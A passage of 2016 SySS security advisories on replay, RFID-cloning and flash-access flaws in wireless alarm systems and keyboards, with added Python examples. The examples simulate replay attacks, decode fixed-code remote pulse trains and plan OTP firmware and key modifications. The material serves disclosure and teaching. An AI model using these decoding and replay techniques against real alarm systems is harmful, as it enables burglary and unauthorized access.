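    def __init__(self, paired: set[bytes]):
        self.paired = paired
        self.armed = True

    def receive(self, frame: bytes) -> bool:
        remote_id, command = frame[:4], frame[4:]
        if remote_id not in self.paired:
            return False
        self.armed = command == ARM
        return True


class RollingRemote:
    """Remote that binds every frame to a fresh counter and a MAC."""
    def __init__(self, remote_id: bytes, key: bytes):
        self.remote_id, self.key, self.counter = remote_id, key, 0

    def press(self, command: bytes) -> bytes:
        self.counter += 1
        body = self.remote_id + struct.pack(">I", self.counter) + command
        tag = hmac.new(self.key, body, hashlib.sha256).digest()[:MAC_LEN]
        return body + tag


class RollingPanel:
    """Panel that verifies the MAC and insists the counter moves forward."""
    def __init__(self, keys: dict[bytes, bytes]):
        self.keys = keys
        self.last_counter = {rid: 0 for rid in keys}
        self.armed = True

    def receive(self, frame: bytes) -> bool:
        body, tag = frame[:-MAC_LEN], frame[-MAC_LEN:]
        remote_id, counter, command = body[:4], struct.unpack(">I", body[4:8])[0], body[8:]
        key = self.keys.get(remote_id)
        if key is None:
            return False
        expected = hmac.new(key, body, hashlib.sha256).digest()[:MAC_LEN]
        if not hmac.compare_digest(tag, expected):
            return False                      # forged or tampered frame
        last = self.last_counter[remote_id]
        if not last < counter <= last + WINDOW:
            return False                      # replayed, or far outside the window
        self.last_counter[remote_id] = counter
        self.armed = command == ARM
        return True


def replay_static() -> tuple[bool, bool]:
    """(owner's press accepted, attacker's replay disarms) for the static design."""
    rid = b"\x12\x34\x56\x78"
    remote, panel = StaticRemote(rid), StaticPanel({rid})
    recorded = remote.press(DISARM)           # attacker's SDR captures this
    first = panel.receive(recorded)
    panel.armed = True                        # owner arms the system again later
    return first, panel.receive(recorded) and not panel.armed


def replay_rolling() -> tuple[bool, bool]:
    """Same sequence against the counter + MAC design."""
    rid = b"\x12\x34\x56\x78"
    remote, panel = RollingRemote(rid, KEY), RollingPanel({rid: KEY})
    recorded = remote.press(DISARM)
    first = panel.receive(recorded)
    panel.receive(remote.press(ARM))          # owner re-arms with a fresh frame
    return first, panel.receive(recorded) and not panel.armed


if __name__ == "__main__":
    print("static remote:  accepted, replay disarms =", replay_static())
    print("rolling remote: accepted, replay disarms =", replay_rolling())
```

The counter alone is not enough: without the MAC an attacker who has seen
one frame could simply increment the counter field. Conversely, the MAC
alone does not help against replay, which is exactly the situation the
two advisories describe. Both mechanisms together are what makes the
recorded frame useless later.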



Solution:

The reported security issue was fixed by the manufacturer in a new
product version.

Further information can be found via the following URL [2]:
http://www.olympia-vertrieb.de/de/support/faq/sicherheitsprodukte.html



Disclosure Timeline:

2016-07-21: Vulnerability reported to manufacturer
2016-08-25: Rescheduled publication date of the security advisory in
agreement with the manufacturer
2016-09-13: According to the manufacturer, a fix to the reported
security issue is available.
2016-10-06: The manufacturer presents the solution to the reported
security issue to SySS GmbH
2016-11-14: Manufacturer provides further information concerning
the security fix
2016-11-23: Public release of security advisory



References:

[1] Product website for Olympia Protect 9061 wireless alarm system
http://www.olympia-vertrieb.de/en/products/security/wireless-alarm-systems/protect-9061.html
[2] Information by the manufacturer concerning the security fix
http://www.olympia-vertrieb.de/de/support/faq/sicherheitsprodukte.html
[3] SySS Security Advisory SYSS-2016-072
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-072.txt
[4] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-BEGIN PGP SIGNATURE-

iQIcBAEBCgAGBQJYNChfAAoJENmkv2o0rU2rT84QAKdU+IVv35uihXP5SnileQCe
ygI9vsfUBK8xrbvRN4uuBaR2Lf70dHxIZkXuGuxhh3DAn3OrM6uE4K1xQW13DMPR
toKAyMXfDWA0Q2+wz0Fz/f86VMGArWoxRTe0Wl7rxh

[FD] [SYSS-2016-107] EASY HOME Alarmanlagen-Set - Cryptographic Issues (CWE-310)

2016-11-25 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-107
Product: EASY HOME Alarmanlagen-Set
Manufacturer: monolith GmbH
Affected Version(s): Model No. MAS-S01-09
Tested Version(s): Model No. MAS-S01-09
Vulnerability Type: Cryptographic Issues (CWE-310)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2016-10-05
Solution Date: -
Public Disclosure: 2016-11-23
CVE Reference: Not yet assigned
Author of Advisory: Gerhard Klostermeier (SySS GmbH)



Overview:

The EASY HOME MAS-S01-09 is a wireless alarm system with different
features sold by ALDI SÜD.

Some of the features as described in the German product manual are
(see [1]; translated here):

"
- Alarm system set with wireless sensors and mobile network connection
- SOS mode, silent alarm, monitoring and intercom function
- Integrated quad-band mobile radio unit for GSM networks in the
  850 / 900 / 1800 / 1900 MHz range
- Alarm notification to external telephones
- Built-in siren (approx. 90 dB), incl. connection for an external siren
- Support for up to 98 wireless sensors / up to 4 wired sensors
- Power failure backup of the base unit by 4 x AAA alkaline batteries
- Remote control via telephone
"

Due to the use of an insecure 125 kHz RFID technology, RFID tokens of
the EASY HOME MAS-S01-09 wireless alarm system can easily be cloned and
used to deactivate the alarm system in an unauthorized way.



Vulnerability Details:

SySS GmbH found out that the 125 kHz RFID technology used by the EASY
HOME MAS-S01-09 wireless alarm system has no protection by means of
authentication against rogue/cloned RFID tokens.

The information stored on the used RFID tokens can be read easily in a
very short time from distances up to 1 meter, depending on the used
RFID reader. A working cloned RFID token is ready for use within a
couple of seconds using freely available tools.

Thus, an attacker with one-time access to the information of an RFID
token of an EASY HOME MAS-S01-09 wireless alarm system is able to create
a rogue RFID token that can be used to deactivate the alarm system in
an unauthorized manner.



Proof of Concept (PoC):

SySS GmbH could successfully clone an RFID token of an EASY HOME
MAS-S01-09 wireless alarm system using a freely available off-the-shelf
tool and disarm the wireless alarm system in an unauthorized way.



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability concerning the tested product version.

For further information please contact the manufacturer.



Disclosure Timeline:

2016-10-05: Vulnerability reported to manufacturer
2016-10-12: E-mail to manufacturer concerning the status of the reported
security issue
2016-11-23: Public release of security advisory



References:

[1] Product manual of EASY HOME MAS-S01-09 wireless alarm system

http://monolith-shop.de/wp-content/uploads/2016/09/MAS-S01-09_Alarmanlage_Bedienungsanleitung.pdf
[2] SySS Security Advisory SYSS-2016-107

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-107.txt
[3] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Gerhard Klostermeier of SySS
GmbH.

E-Mail: gerhard.klostermeier (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc
Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-BEGIN PGP SIGNATURE-

iQIcBAEBCgAGBQJYNChyAAoJENmkv2o0rU2r4MwQAKTTTRhqNyMi34MxOxUBDAQu
ro3KnFe9C20jiDgnXhLNpwEjsDhqiI4VizScDPQ9EvLE5j5qA0M4SaPn3AZtIiDh
XzKQFJ9Zqoe9COetmx8bEEtCTE1zz5WNy+MNNNqBPGKoIaM54Bcfp9u2W1fQhYW6
m0oTM/y3PPBG7R1xX5el5XPvrqu1Ic2Wr3aT7/MCSApk2cWQic4btERsnhFv4m1N
8bP0Ez9gNsgMRMzxV0vAS1f7AXJLh2tXxdFARhf5S6hnyMxiRpwDeStr6sOUWOTm
iMWIGvptD/kFyJXsg8wLM7h4pqA/Ie9IXe3qETzH83bAEALggb3nT0vFRcPiMeOG

[FD] [SYSS-2016-066] Multi Kon Trade M2B GSM Wireless Alarm System - Missing Protection against Replay Attacks

2016-11-25 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-066
Product: M2B GSM Wireless Alarm System
Manufacturer: Multi Kon Trade
Affected Version(s): Unspecified
Tested Version(s): Unspecified
Vulnerability Type: Missing Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-07-05
Solution Date: -
Public Disclosure: 2016-11-23
CVE Reference: Not yet assigned
Author of Advisory: Gerhard Klostermeier, SySS GmbH



Overview:

The M2B GSM wireless alarm system by Multi Kon Trade (MKT) was tested
for possible security issues.

Some features of this alarm system as described by the manufacturer are
(see [1]):

* You will be notified of any alarm by call or by SMS message.
* The alarm system has a battery which will last 6 to 8 hours in case
  of a blackout.
* You can pair up to 99 devices (sensors, remote control, etc.).
* You do not have to run any cables. Everything is wireless.
* It is possible to trigger alarms in case of fire, even if the
  alarm is disabled.
* It is possible to trigger the alarm with a delay.

Due to an insecure implementation of the used 433 MHz radio
communication, the wireless alarm system M2B GSM is vulnerable to
replay attacks.



Vulnerability Details:

SySS GmbH found out that the radio communication protocol used by the
M2B GSM wireless alarm system and its remote control is not protected
against replay attacks. Therefore, an attacker can record the radio
signal of a wireless remote control, for example using a software
defined radio, when the alarm system is disarmed by its owner, and play
it back at a later time in order to disable the alarm system at will.



Proof of Concept (PoC):

SySS GmbH built a small device that is able to perform replay attacks
against the 433 MHz radio communication of the M2B GSM wireless alarm
system, for example in order to arm and disarm the wireless alarm
system in an unauthorized manner.
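The references list the PT2260 remote control encoder datasheet [2], which
indicates the kind of fixed-code transmitter involved. As an added example
(not code from the advisory or the vendor), the following Python
encoder/decoder models PT2260/PT2262-style code words together with a
receiver that accepts them. The pulse timings are stated in the block as an
assumption to be checked against [2]; the code word, oscillator period and
timing jitter are constructed values.

```python
"""Added example, not code from the SySS advisory: what a fixed-code 433 MHz
remote control such as one built around the PT2260 encoder referenced in
[2] sends, and why one recording is enough to replay it.

Timing model (assumption: taken from the PT2260/PT2262 encoder family
datasheets as remembered by the author of this example; check against [2]):
the 12-symbol code word set by the address/data pins is sent as two
high/low pulse pairs per symbol, widths in units of the oscillator period a
(the absolute value depends on the oscillator resistor):
  '0' -> (4a high, 12a low) x2      '1' -> (12a high, 4a low) x2
  'f' -> (4a high, 12a low), (12a high, 4a low)      (floating pin)
followed by a sync symbol (4a high, 124a low). Nothing in the word depends
on a counter or nonce, so every press produces the same waveform.
"""
from typing import Dict, List, Tuple

Pulse = Tuple[int, int]           # (high_us, low_us)

SYMBOL_PULSES: Dict[str, Tuple[Tuple[int, int], Tuple[int, int]]] = {
    "0": ((4, 12), (4, 12)),
    "1": ((12, 4), (12, 4)),
    "f": ((4, 12), (12, 4)),
}
SYNC = (4, 124)


def pt226x_encode(code: str, alpha_us: int = 100) -> List[Pulse]:
    """Pulse train for one code word; identical for every press of the button."""
    if len(code) != 12 or any(c not in SYMBOL_PULSES for c in code):
        raise ValueError("code word must be 12 symbols from {0, 1, f}")
    pulses = [(h * alpha_us, l * alpha_us) for c in code for h, l in SYMBOL_PULSES[c]]
    pulses.append((SYNC[0] * alpha_us, SYNC[1] * alpha_us))
    return pulses


def _shape(high: float, low: float, alpha: float, tol: float) -> str:
    """Classify one pulse pair: 'S' = short high/long low, 'L' = long high/short low."""
    def near(value: float, target: float) -> bool:
        return abs(value - target) <= tol * target
    if near(high, 4 * alpha) and near(low, 12 * alpha):
        return "S"
    if near(high, 12 * alpha) and near(low, 4 * alpha):
        return "L"
    raise ValueError(f"pulse pair {(high, low)} does not fit the timing model")


def pt226x_decode(pulses: List[Pulse], tol: float = 0.3) -> str:
    """Recover the code word from a captured pulse train. The oscillator period
    is estimated from the 124a sync gap, so a sniffer does not need to know
    the transmitter's resistor value."""
    if len(pulses) != 25:
        raise ValueError("expected 24 pulse pairs plus one sync pulse")
    sync_high, sync_low = pulses[-1]
    alpha = sync_low / 124
    if abs(sync_high - 4 * alpha) > tol * 4 * alpha:
        raise ValueError("sync pulse does not fit the timing model")
    shapes = [_shape(h, l, alpha, tol) for h, l in pulses[:-1]]
    symbols = {("S", "S"): "0", ("L", "L"): "1", ("S", "L"): "f"}
    code = ""
    for i in range(0, 24, 2):
        pair = (shapes[i], shapes[i + 1])
        if pair not in symbols:
            raise ValueError(f"invalid symbol at position {i // 2}")
        code += symbols[pair]
    return code


class FixedCodeReceiver:
    """Model of the panel's receiver: it knows the paired code word and accepts
    any pulse train that decodes to it. No state distinguishes a fresh button
    press from a replayed recording."""
    def __init__(self, paired_code: str) -> None:
        self.paired_code = paired_code

    def accepts(self, pulses: List[Pulse]) -> bool:
        try:
            return pt226x_decode(pulses) == self.paired_code
        except ValueError:
            return False


def replay_demo() -> bool:
    """Record one 'disarm' frame with an SDR (jitter included), replay it later."""
    remote_code = "0f1f0f10ff01"                      # constructed address/data setting
    panel = FixedCodeReceiver(remote_code)
    recording = pt226x_encode(remote_code, alpha_us=90)
    replayed = [(int(h * 1.08), int(l * 0.93)) for h, l in recording]   # ~10% timing error
    return panel.accepts(replayed) and pt226x_encode(remote_code, 90) == recording
```

replay_demo() records one frame, with the timing error an SDR capture
would carry, and plays it back later; FixedCodeReceiver.accepts() returns
True both times, because the frame is a pure function of the pin settings
and the receiver keeps no state that could tell a replay from a fresh
press. The tolerance in the decoder also shows why the replay does not
need a bit-exact reproduction: the receiver re-derives the clock from the
sync gap.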



Solution:

Do not use the 433 MHz remote control to arm or disarm the system.
Instead it is recommended to use the app for iOS and Android smartphones
or to arm and disarm the system manually with the on-board keypad.
(Solution as suggested by the vendor.)



Disclosure Timeline:

2016-07-05: Vulnerability reported to manufacturer
2016-10-13: Response from the vendor with the solution on how to
mitigate the risk
2016-11-23: Public release of security advisory



References:

[1] M2B GSM Wireless Alarm System, Multi Kon Trade
http://multikontrade.de/GSM-Funk-Alarmanlage
[2] PT2260 Remote Control Encoder, Princeton Technology Corp.
http://www.princeton.com.tw/Portals/0/Product/PT2260_4.pdf
[3] SySS Security Advisory SYSS-2016-066

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-066.txt
[4] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Gerhard Klostermeier of SySS
GmbH.

E-Mail: gerhard.klostermeier (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc
Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-BEGIN PGP SIGNATURE-

[FD] [SYSS-2016-071] Blaupunkt Smart GSM Alarm SA 2500 Kit - Missing Protection against Replay Attacks

2016-11-25 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-071
Product: Smart GSM Alarm SA 2500 Kit
Manufacturer: Blaupunkt
Affected Version(s): v1.0
Tested Version(s): v1.0
Vulnerability Type: Missing Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-07-14
Solution Date: -
Public Disclosure: 2016-11-23
CVE Reference: Not yet assigned
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

The Blaupunkt Smart GSM Alarm SA 2500 Kit is a wireless alarm system
with different features.

The manufacturer describes the product as follows (see [1]):

"Home is priceless. Protecting home should be anyone's top priority.
Blaupunkt Smart Alarm Series SA 2500/ SA 2700 Kit offers you an easy
and efficient way to do 'DIY security, DIY protection.' You can set up
a quality security system all by yourself and control/monitor your home
from your smartphone anytime, anywhere."

Due to an insecure implementation of the used 868 MHz radio
communication, the wireless alarm system Blaupunkt Smart GSM Alarm SA
2500 Kit is vulnerable to replay attacks.



Vulnerability Details:

SySS GmbH found out that the radio communication protocol used by the
Blaupunkt Smart GSM Alarm SA 2500 wireless alarm system and its remote
control is not protected against replay attacks. Therefore, an attacker
can record the radio signal of a wireless remote control, for example
using a software-defined radio, when the alarm system is disarmed by its
owner, and play it back at a later time in order to disable the alarm
system at will.



Proof of Concept (PoC):

SySS GmbH could successfully perform a replay attack as described in the
previous section using a software-defined radio and disarm a Blaupunkt
Smart GSM Alarm SA 2500 wireless alarm system in an unauthorized way.



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.

For further information please contact the manufacturer.



Disclosure Timeline:

2016-07-14: Vulnerability reported to manufacturer via e-mail and a
ticket in the Blaupunkt customer service portal
2016-07-14: Received an e-mail from the manufacturer confirming the
ticket
2016-07-15: Manufacturer closed the ticket without any further
notification or solution regarding the reported security
vulnerability
2016-11-23: Public release of security advisory



References:

[1] Blaupunkt Smart GSM Alarm Series SA 2500/SA 2700 KIT
http://www.blaupunkt.com/uploads/tx_ddfproductsbp/2500-2700_39.pdf
[2] SySS Security Advisory SYSS-2016-071

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-071.txt
[3] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-BEGIN PGP SIGNATURE-

[FD] [SYSS-2016-106] EASY HOME Alarmanlagen-Set - Missing Protection against Replay Attacks

2016-11-25 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-106
Product: EASY HOME Alarmanlagen-Set
Manufacturer: monolith GmbH
Affected Version(s): Model No. MAS-S01-09
Tested Version(s): Model No. MAS-S01-09
Vulnerability Type: Missing Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-09-26
Solution Date: -
Public Disclosure: 2016-11-23
CVE Reference: Not yet assigned
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

The EASY HOME MAS-S01-09 is a wireless alarm system with different
features sold by ALDI SÜD.

Some of the features as described in the German product manual are
(see [1]; translated from German):

"
- Alarm system set with wireless sensors and mobile network connectivity
- SOS mode, silent alarm, monitoring and intercom function
- Integrated quad-band cellular unit for GSM networks in the 850 / 900 /
  1800 / 1900 MHz range
- Alarm notification to external telephones
- Built-in siren (approx. 90 dB), incl. connector for an external siren
- Support for up to 98 wireless sensors / up to 4 wired sensors
- Power failure backup of the base unit by 4 x AAA alkaline batteries
- Remote control via telephone
"

Due to an insecure implementation of the used 433 MHz radio
communication, the EASY HOME MAS-S01-09 wireless alarm system is
vulnerable to replay attacks.



Vulnerability Details:

SySS GmbH found out that the radio communication protocol used by the
EASY HOME MAS-S01-09 wireless alarm system and its remote control is
not protected against replay attacks. Therefore, an attacker can record
the 433 MHz radio signal of a wireless remote control, for example using
a software-defined radio, when the alarm system is disarmed by its
owner, and play it back at a later time in order to disable the alarm
system at will.



Proof of Concept (PoC):

SySS GmbH could successfully perform a replay attack as described in the
previous section using a software-defined radio and disarm an EASY HOME
MAS-S01-09 wireless alarm system in an unauthorized way.



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability concerning the tested product version.

For further information please contact the manufacturer.



Disclosure Timeline:

2016-09-26: Vulnerability reported to manufacturer
2016-09-30: Manufacturer responds to the reported security issue, stating
that the information will be integrated into the next product
version
2016-09-30: E-mail to manufacturer concerning a security advice in the
product manual
2016-10-04: Response concerning security advice in product manual
2016-11-23: Public release of security advisory



References:

[1] Product manual of EASY HOME MAS-S01-09 wireless alarm system

http://monolith-shop.de/wp-content/uploads/2016/09/MAS-S01-09_Alarmanlage_Bedienungsanleitung.pdf
[2] SySS Security Advisory SYSS-2016-106

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-106.txt
[3] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-BEGIN PGP SIGNATURE-

iQIcBAEBCgAGBQJYNChqAAoJENmkv2o0rU2rznUP/R2Pg/9Dkc3GPJDKGd1HTaSo
AC/qluqMjGs8FcPj03WPewT2MlTRBLdkEsgP9kUluC8ohvPS6ybBsogTjcNPQ+vp
Qu0gqbhPohTv2VcRlMFAlLycuv2jG56OZ9H6hyNxhCTb8rY8RUI1Ox8R+KQEEFTW
fASLsoGt6aRRucHSQW0v/W8MfAVM4oo7JGTt5NG5aJ6Fl7pzJJ2a31KZ/lFnAXo3
4WJf5z3WbiHVb9nHs9d95+RrbCQWOAi34VRvlENlc6Sw6dYQ6QvaC0L+SA7CKhbe
z0qy0xiz0H14ISnX+7MeVQzvw/MFCA75qRljMoTNVxM3Sm8jxEh7KxYIXL9/KdY6
e76zGYo70YUYRq5lvwI9YRtcTWELzEQ5kanD0W0f8BnrT76l3DDFiCprK4By8dwP
rxJKj

[FD] [SYSS-2016-068] Fujitsu Wireless Keyboard Set LX901 - Cryptographic Issues (CWE-310), Missing Protection against Replay Attacks

2016-10-11 Thread Matthias Deeg
Advisory ID: SYSS-2016-068
Product: Wireless Keyboard Set LX901
Manufacturer: Fujitsu
Affected Version(s): Model No. GK900
Tested Version(s): Model No. GK900
Vulnerability Type: Cryptographic Issues (CWE-310)
Missing Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-07-07
Solution Date: -
Public Disclosure: 2016-10-05
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH)



Overview:

Fujitsu Wireless Keyboard Set LX901 is a wireless desktop set consisting
of a mouse and a keyboard.

The manufacturer describes the product as follows (see [1]):

"The Wireless Keyboard LX901 is a top of the line desktop solution
for lifestyle orientated customers, who want only the best for their
desk. This superb keyboard set offers ambitious users more functions,
security and better features than a conventional interface device. It
even includes 2.4 GHz technology and 128 AES encryption for security."

Due to an insecure implementation of the encrypted data communication,
the wireless keyboard LX901 is vulnerable to replay attacks.



Vulnerability Details:

The SySS GmbH found out that the wireless keyboard Fujitsu LX901 is
prone to replay attacks.

An attacker can sniff the AES-encrypted data packets of the 2.4 GHz
radio communication sent by the keyboard to the receiver (USB dongle)
and replay the recorded communication data at will causing the same
effect as the original data communication.

A replay attack against the keyboard can, for example, be used to gain
unauthorized access to a computer system that is operated with a
vulnerable Fujitsu LX901 keyboard. In this attack scenario, an attacker
records the radio communication during a password-based user
authentication of his or her victim, for instance during a login to the
operating system or during unlocking a screen lock. At an opportune
moment when the victim's computer system is unattended, the attacker
approaches the victim's computer and replays the previously recorded
AES-encrypted data communication for the password-based user
authentication and thereby gets unauthorized access to the victim's
system.



Proof of Concept (PoC):

The SySS GmbH could successfully perform a replay attack as described
in the previous section using a software-defined radio in combination
with the software tool GNU Radio Companion.



Solution:

According to information from the manufacturer Fujitsu, the reported
security issue will currently not be fixed in affected products.

The written statement in German from Fujitsu regarding this security
issue is as follows:

"Vielen Dank für Ihre Informationen zu unserer Funktastatur. Wie Ihnen
bereits mitgeteilt, halten wir das von Ihnen beschriebene
Angriffsszenario bei unserer Tastatur aufgrund des verwendeten
Funkprotokolls unter realen Bedingungen für nicht so einfach
durchführbar. Wie erwähnt, verkaufen wir mit unserer Tastatur keine
Sicherheitslösung, sondern eine Komfortlösung (ohne gravierende
Sicherheitsnachteile wie bei unverschlüsselten Wireless-Tastaturen).
In einem bereits geplanten Nachfolgeprodukt werden alle neuen
Erkenntnisse zur sicheren Datenübertragung bei Funktastaturen
einfließen."

The English translation of this statement is as follows:

"Thank you very much for your information about our wireless keyboard.
As we have already pointed out, we believe that the described scenario
is not easy to perform under real conditions due to the radio protocol
used. As mentioned, our product is not destined to sell security, but
convenience in the first place (without the security drawbacks of
unencrypted wireless keyboards). Any new information and insights will
be incorporated into the already planned successor product."



Disclosure Timeline:

2016-07-07: Vulnerability reported to manufacturer
2016-07-08: Manufacturer acknowledges e-mail with SySS security advisory
2016-08-02: E-mail from manufacturer requesting further information
2016-08-04: Provided further information to manufacturer via e-mail
2016-08-05: E-mail from manufacturer with further questions
2016-08-08: E-mail to manufacturer with answers to open questions
2016-08-12: E-mail from manufacturer with statement regarding the
reported security issue
2016-10-05: Public release of the security advisory



References:

[1] Product website for Fujitsu Wireless Keyboard Set

http://www.fujitsu.com/global/products/computing/peripheral/accessories/input-devices/keyboards/w

[FD] [SYSS-2016-033] Microsoft Wireless Desktop 2000 - Insufficient Protection of Code (Firmware) and Data (Cryptographic Key)

2016-10-11 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-033
Product: Microsoft Wireless Desktop 2000
Manufacturer: Microsoft
Affected Version(s): Ver. A
Tested Version(s): Ver. A
Vulnerability Type: Insufficient Protection of Code (Firmware) and
Data (Cryptographic Key)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-04-22
Solution Date: -
Public Disclosure: 2016-10-05
CVE Reference: Not yet assigned
Authors of Advisory: Gerhard Klostermeier and Matthias Deeg (SySS GmbH)



Overview:

Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of
a mouse and a keyboard.

The manufacturer describes the product as follows (see [1]):

"This keyboard features Advanced Encryption Standard (AES) technology,
which is designed to help protect your information by encrypting your
keystrokes. Each keyboard is permanently paired with its receiver at
the factory - no key information is ever shared over the air."

Due to the insufficient protection of the flash memory of the keyboard
and of the USB dongle, an attacker with physical access has read and
write access to the firmware and the used cryptographic key.



Vulnerability Details:

The SySS GmbH found out that the embedded flash memory of the wireless
keyboard Microsoft Wireless Desktop 2000  and of the corresponding USB
dongle can be read and written via the SPI interface of the used
transceivers with an embedded microcontroller nRF24LE1H (keyboard) and
nRF24LU1+ (USB dongle) as the flash memory is not protected by the
offered read back protection feature (RDISMB - Read DISable Main Block).

Thus, an attacker with physical access to the keyboard or the USB
dongle can simply read and write the SPI-addressable code and data
flash memory. Due to the use of nRF24 transceiver versions with one-time
programmable memory, write access is limited in such a way that a set
1 bit can be changed to a 0 bit but not vice versa.

The AES cryptographic key used by the Microsoft Wireless Desktop 2000
keyboard and the corresponding USB dongle is for both devices accessible
via the SPI interface.

By having read and write access to the code and data flash memory, an
attacker can either extract the cryptographic key, for instance to
perform further attacks against the wireless communication, or modify
the firmware or the cryptographic key in a limited way due to the
used one-time programmable memory.
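As an added example (not code from the advisory), the following Python
models the write constraint just described: a programmer for OTP flash can
only clear bits, which bounds what an attacker with write access can do to
the firmware and to the stored key. The image bytes and the target key are
constructed; the 8051 opcode values are those of the 8051-compatible core
of the nRF24LE1 and nRF24LU1+.

```python
"""Added example, not code from the SySS advisory: planning a modification
of one-time programmable (OTP) flash such as the nRF24 variants described
above, where programming can only clear bits (1 -> 0), never set them.
All image bytes below are constructed for illustration; no real firmware
or key material from the product is used.
"""
from typing import List, Tuple


def plan_otp_write(current: bytes, desired: bytes) -> Tuple[List[Tuple[int, int]], List[int]]:
    """Return (writes, impossible). `writes` lists the (offset, byte) values a
    programmer would have to emit; `impossible` lists offsets whose target
    needs a 0 -> 1 transition, which OTP memory cannot perform."""
    if len(current) != len(desired):
        raise ValueError("images differ in length")
    writes: List[Tuple[int, int]] = []
    impossible: List[int] = []
    for off, (old, new) in enumerate(zip(current, desired)):
        if new & ~old & 0xFF:          # some bit is 0 now but 1 in the target
            impossible.append(off)
        elif new != old:
            writes.append((off, new))
    return writes, impossible


def reachable(current: bytes, desired: bytes) -> bool:
    """True if `desired` can be programmed over `current` by clearing bits only."""
    return not plan_otp_write(current, desired)[1]


def key_modification_options(stored_key: bytes) -> Tuple[bool, bool]:
    """What write access to a key in OTP memory allows: replacing it with an
    arbitrary new key (here a constructed one) is generally impossible, but
    forcing it to all-zero, a value the attacker then knows, always is."""
    arbitrary = bytes((b * 7 + 13) & 0xFF for b in range(len(stored_key)))
    return reachable(stored_key, arbitrary), reachable(stored_key, bytes(len(stored_key)))


def nop_out_jump(code: bytes, offset: int) -> List[Tuple[int, int]]:
    """A firmware patch OTP memory still permits: on the 8051-compatible core,
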